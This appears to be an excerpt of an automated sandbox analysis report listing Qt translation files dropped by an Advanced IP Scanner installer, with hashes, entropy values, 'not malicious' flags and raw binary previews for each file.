SHA-512:	D6A224A13C9E301DA124D660FD30B7FBBC8BADBA6484D39D1FDAC5410D44C48A963EA1182237FD72AD77609898C8F713CB22DCD7E20EA037BFAE6B8E25DB25C3
Malicious:	false
Preview:	<.d....!..`...B..........\....;...^...;.......;..!....;.."....;..E....O..^....[..Z....^..1....^..VL..(5......G.......H,..SB..K...B...N:.. ...V...G..._...`..............Sm...y..S........S.......Z......[....t..,O...t..TL...t..^y.....B....j.. ...5t......@...D...H5..\...f...1.......G....................~..4....`..9D...e..].......^.......... =...H...y...j..y......%..&V..0..&..+.......+.....v.+......+......+....().G....!..G....,..H0...^I.Hw9...Y.Hw9.....I....>.J6....$.J6......J6......J6...Ke.LD......L.b..^..M.S..CN.R.....\|.V....1..Wi...]..W.T.....Z.\|..U..[f3..X..gc......w0K..I...H...'5......_....T......."..6z...~..8... d..H9...T..0'..2....]......].......cm.9.E..Bj.L.#..f..M$o.....e.....\|.l8...8[...^..K...I....h......D.......V.......\...>...u..>......3..1S..l...MH......;..5.l..b..AV...)..y....Z....0..V.......U.......\_..tb..7>...............=......W%......?\|......Q..(....Vr.1V...+..R....3..W.<..b..f.~..#.......6...1....-...^..7....5...1..........c..H..;6...d..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_el_gr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	29651
Entropy (8bit):	5.330350785151233
Encrypted:	false
SSDEEP:	768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
MD5:	E1A891010B901FE6055532E588E20293
SHA1:	167F62B548D6628FC1B989F6FD232BD362B59C23
SHA-256:	B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
SHA-512:	AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
Malicious:	false
Preview:	<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K...y...,..y......%..'...0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.\|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 ..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_en_us.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	319
Entropy (8bit):	4.379102897885305
Encrypted:	false
SSDEEP:	6:CwTA5/S39XWIlkHKVDQEoE6J2lRWRYrWlp/IM1gEE6J2lRWRYrWlp2lbIMWSEE/1:HA0tR5pQlXJ2lRWGcPXJ2lRWG8+
MD5:	FA3064E9270B3CE8D90EF2C4E00277C5
SHA1:	6E55C6F99FDA993DD301172900AD96DE2258C6FC
SHA-256:	BA4E20952EAE5DD959F1C0D3A4B9726A37BD81645D9DDE6B83C1E367032C77CD
SHA-512:	12A796A7FA23B325B172CF4A1491A146117A0C938D1C64369EB1B7DF7277676832B32D5221383E48E8E244225E370DC75B69F5C7638A4A7D4FF6121A26032AC1
Malicious:	false
Preview:	<.d....!..`...B.............O.....P..q.....i........$.C.&.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s..........Check for &updates.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.S.e.r.v.e.r..........Install Radmin Server.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.V.i.e.w.e.r..........Install Radmin Viewer.....VMain........

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_es_es.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28507
Entropy (8bit):	4.623752380391833
Encrypted:	false
SSDEEP:	384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
MD5:	C576730007E97DD3B8F3C46FFF0F6DDD
SHA1:	311DF6FDB52905E3FFA80494FE0E1E7534060155
SHA-256:	F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
SHA-512:	427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
Malicious:	false
Preview:	<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H...y......y...Q..%..%...0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.\|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_et_ee.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27091
Entropy (8bit):	4.712868636230012
Encrypted:	false
SSDEEP:	384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
MD5:	9D3E23BE36601D3604F9F370942DAA55
SHA1:	AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
SHA-256:	0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
SHA-512:	3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
Malicious:	false
Preview:	<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_..y...&..y...S..%..#...0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.\|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fa_ir.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26044
Entropy (8bit):	5.23160860836295
Encrypted:	false
SSDEEP:	384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
MD5:	D7B6ACB98C438672B2D6E2DA7720191D
SHA1:	3F2CCE40CA80158F1A24258309E78978A8915C85
SHA-256:	DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
SHA-512:	ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
Malicious:	false
Preview:	<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#..y......y...Y..%..!...0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.\|..Ls.[f3..O..gc......w0K..B..H...".......U....T...I..."..0....~..2~.. d..@....T.....2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fi_fi.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27753
Entropy (8bit):	4.678188889713697
Encrypted:	false
SSDEEP:	384:G9OyAk9n+iiUO3ipj1BlQdiJCEG7o5CjUiiPtVPpCAIA+rp9kBMHoyAC:G9OKn+i+3QjedMCUUUZVPp6z
MD5:	0D6C50CD51EDD656D636117A22517308
SHA1:	B9753A4E1D581A19D39B71187CBECCEAC0BA5066
SHA-256:	D8680E21C7F89BB60C631AF894F5DEAB5B95CF87A6624F04B087C4A1BDBEACAD
SHA-512:	91158D0D0B3DE7C34231F20542E2F2E8F98E76128C4E5B86F358E804CA6D30AD9E6162DE39FF018802CFDFA1BD6E3B3A85AB7A78AD77CC334D6478F8E815D02C
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.../...;.......;.. ....;..B....O..[f...[..W(...^../?...^..S...(5...W..G.......H,..P...K...?4..N:......V...D/.._...\.......(\|......P5...y..P........=..............XZ...t......t..Q....t..[......@4...j......5t...k..@...A...H5..Y'..f.../g......D....................~..2X...`..6....e..Zw......Z.......... =...E...y...n..y......%..$`..0..$..+.......+.....,.+......+....n.+....&3.G.......G....m.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....h.J6...H..LD......L.b..[<.M.S..@..R.......V..../..Wi...Z .W.T...[.Z.\|..Q..[f3..U..gc......w0K..G"..H...%9......\....T......."..40...~..6R.. d..Ec...T..-...2....-......Y......._..9.E..?..L.#..b?.M$o.....e.....H.l8...6....^..H...I....Z......B$......R.......YO..>...7..>......3......l...Jj......94.5.l..^..AV...'..y....W....0..S.......R.......X...tb..5.......................S.......<.......N..(....S6.1V...)..R....1I.W.<.._5.f.~..!.......3...1........^..5a...5...u......2...c..E..;6...`..q.J..O\|..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fr_fr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28669
Entropy (8bit):	4.635479137963866
Encrypted:	false
SSDEEP:	384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
MD5:	A5D24342E9B32AD9714C091BB135D180
SHA1:	7B193290CFE8190B60122C2219972512695E5D68
SHA-256:	2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
SHA-512:	140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
Malicious:	false
Preview:	<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK..y......y......%..&...0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.\|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V.....R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_he_il.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	24993
Entropy (8bit):	5.35342565714326
Encrypted:	false
SSDEEP:	384:6vsXcNgywHOUW6MAlHWknGhq984qSDPGZbGCeozTGAGaj:8gywHOUXMAlHWknOqi+G5GC9
MD5:	3928085E21EA3A08476A8FF476B3DF1E
SHA1:	811D18C1C6F92CB49902E060E5C47700D5AF87B1
SHA-256:	A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
SHA-512:	0ED2A612815E1632D037F0651B70AB8797EA5B9CF06B040EFE1DE5805F0F6E50A3BFA84F2A28A7A45156C2141BA5A5FE1CAC99260BBAAC1A0B25DE1929747F40
Malicious:	false
Preview:	<.d....!..`...B..........N0...;.......;...w...;.......;.......;..; ...O..P....[..L....^..C...^..IB..(5......G.......H,..F...K...7...N:......V...<o.._...Q.......$J......F....y..G/.......?..............N....t..%....t..G....t..Pm.....8....j......5t...+..@...:E..H5..N...f...g......=........).......Q...~..,....`..0n...e..O.......P.......... =...>...y......y......%.. ...0.. ..+.......+.....6.+......+....l.+...."G.G.......G....&..H0...PI.Hw9.....Hw9.....I....#..J6......J6....<.J6......J6...@s.LD....T.L.b..P..M.S..8..R.....<.V......Wi...O..W.T.....Z.\|..HA.[f3..K..gc....^.w0K..?$..H...!i......Q^...T......."...`...~..0... d..=....T..(...2...........O"......T..9.E..8..L.#..Ws.M$o...8.e.....f.l8.../....^..@...I..........:p......H.......N...>......>......3..)...l...A.......2..5.l..S..AV...#..y....M_...0..I.......H.......N...tb..........................J.......5.......Ez.(....Il.1V...$..R....+..W.<..Tg.f.~...H..........1........^../E...5..............c..=..;6...U..q.J..F6..I....y..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hr_hr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27888
Entropy (8bit):	4.695402138614251
Encrypted:	false
SSDEEP:	384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
MD5:	B1DC69B7C86A8BEBB7B758BB8B241535
SHA1:	B75C4FC69FAC889067A836AB620285984476B7D9
SHA-256:	ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
SHA-512:	62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t......t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw..y......y......%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.\|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hu_hu.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28416
Entropy (8bit):	4.745555315840919
Encrypted:	false
SSDEEP:	768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
MD5:	A8F9FC9108D8E44F2111BC7AC63C9F75
SHA1:	1692FD262A44FD674D4E48644CE22C175AF0C865
SHA-256:	A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
SHA-512:	99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8\|...e..\.......\........(. =...G...y......y......%..%...0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6.....J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.\|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_id_id.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27444
Entropy (8bit):	4.672755214321859
Encrypted:	false
SSDEEP:	384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
MD5:	5323FC9E0D0110FE16F649B91167E604
SHA1:	88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
SHA-256:	660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
SHA-512:	526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
Malicious:	false
Preview:	<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO..y......y......%..$>..0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.\|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 ..1........^..4....5...w......t...c..E..;6..._{.q.J..NL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_it_it.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28141
Entropy (8bit):	4.629516521520014
Encrypted:	false
SSDEEP:	384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
MD5:	08AB1F12E7ED69CA493109B02A920C27
SHA1:	CD6433F48E1FA82747C57AE254E046BDEDC8A429
SHA-256:	943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
SHA-512:	C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..D....O..\....[..XZ...^..0e...^..T...(5......G....R..H,..Q...K...@...N:...Z..V...E..._...].......)\......Q=...y..Q................`......Y....t..+....t..R....t..\G.....A....j......5t......@...C...H5..Zu..f...0.......F....................~..3>...`..8....e..[.......[.......... =...G...y......y.../..%..%N..0..%w.+.....5.+.......+....f.+......+....'..G.... ..G....+e.H0...\..Hw9...Q.Hw9.....I....(..J6....Z.J6......J6......J6...J7.LD......L.b..\v.M.S..B,.R.....Z.V....0..Wi...[p.W.T.....Z.\|..R..[f3..V..gc....".w0K..H...H...&!......]^...T...;..."..5L...~..7... d..G....T......2....W......Z.......a1.9.E..A<.L.#..c..M$o.....e.......l8...77...^..Jn..I....h......C.......S.......Z...>...w..>......3../...l...K.......:..5.l..`C.AV...(..y....X....0..T.......S.......Z9..tb..6 ...............a......U.......>.......O..(....TB.1V...)..R....2/.W.<..`..f.~.."p......4...1........^..6....5..............c..G\.;6...bW.q.J..P...I....#..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ja_jp.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	23348
Entropy (8bit):	5.657948878761793
Encrypted:	false
SSDEEP:	384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
MD5:	EFD6D076AAD193007E77BFA1BB46E3DA
SHA1:	92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
SHA-256:	2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
SHA-512:	11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
Malicious:	false
Preview:	<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9...y......y...i..%......0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.\|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ko_kr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	22516
Entropy (8bit):	5.64342773223904
Encrypted:	false
SSDEEP:	384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
MD5:	C09D31E3E2A0F6B673F8B26AA49B8E9E
SHA1:	829B459D3642E84D0F0E0AE30D16203C583B1A88
SHA-256:	30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
SHA-512:	DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
Malicious:	false
Preview:	<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....\|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........\|. =...7...y......y......%...v..0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.\|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."......~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lt_lt.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28545
Entropy (8bit):	4.714189994601161
Encrypted:	false
SSDEEP:	384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
MD5:	2AADC93C38DBB7E1D048B05B63133217
SHA1:	66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
SHA-256:	A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
SHA-512:	63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
Malicious:	false
Preview:	<.d....!..`...B..........[...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H...y......y......%..%V..0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.\|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lv_lv.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27649
Entropy (8bit):	4.760709648438812
Encrypted:	false
